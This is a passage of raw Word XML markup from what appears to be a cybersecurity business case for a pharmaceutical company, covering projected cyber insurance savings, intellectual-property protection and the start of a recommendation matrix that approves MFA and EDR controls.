    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Coverage: £25M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Deductible: £1M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Projected Premium Reduction: 30-40% (£150-200K annual savings) </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[87]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Improved Coverage Terms: Lower deductible (£500K)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Extended Coverage: Business interruption included</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">According to Marsh McLennan's 2024 Cyber Insurance Market Report, organizations implementing comprehensive security controls experience average premium reductions of 35% </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[87]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3-Year Insurance Savings:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £450,000-£600,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Competitive Advantage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-to-Market Protectio</w:t>
      </w:r>
      <w:r w:rsidR="00086687" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Secure pipeline ensures R&amp;D data integrity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Prevents competitor intelligence gathering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Protects patent applications from pre-disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Research by Deloitte indicates that pharmaceutical companies losing IP to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>competitors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> experience average delays of 18-24 months in bringing drugs to market, resulting in £30-50M revenue loss per product </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[88]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Estimated Value:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> First-to-market advantage worth £30-50M per drug launch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendation Matrix</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1533"/>
        <w:gridCol w:w="1512"/>
        <w:gridCol w:w="1501"/>
        <w:gridCol w:w="1720"/>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="1533"/>
      </w:tblGrid>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00086687">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00086687">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00086687">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Risk Reduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00086687">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Decision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£65K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">99.9% credential attacks </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[62]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>APPROVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£150K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>60 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">90% malware/APT </w:t>
            </w:r>
            <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[69]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>APPROVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
